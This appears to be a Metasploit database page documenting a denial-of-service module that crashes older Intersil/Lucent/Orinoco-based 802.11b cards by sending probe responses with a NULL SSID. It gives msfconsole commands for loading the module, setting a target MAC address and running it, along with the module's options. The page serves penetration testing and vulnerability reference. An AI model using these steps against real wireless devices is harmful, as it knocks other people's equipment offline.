Multiple Wireless Vendor NULL SSID Probe Response | Metasploit Exploit Database (DB)

Multiple Wireless Vendor NULL SSID Probe Response

This module exploits a firmware-level vulnerability in a variety of 802.11b devices. This attack works by sending a probe response frame containing a NULL SSID information element to an affected device. This flaw affects many cards based on the Choice MAC (Intersil, Lucent, Agere, Orinoco, and the first generation of Airport cards).

Search Other Modules


Rank

  • Normal

Authors

  • hdm < hdm [at] metasploit.com >

Vulnerability References


Development


Similar Modules


Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use auxiliary/dos/wifi/probe_resp_null_ssid
msf auxiliary(probe_resp_null_ssid) > set ADDR_DST [STRING]
msf auxiliary(probe_resp_null_ssid) > run


Module Options

ADDR_DST The MAC address of the target system
CHANNEL The initial channel (default: 11)
COUNT The number of frames to send (default: 2000)
DRIVER The name of the wireless driver for lorcon (default: autodetect)
INTERFACE The name of the wireless interface (default: wlan0)
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module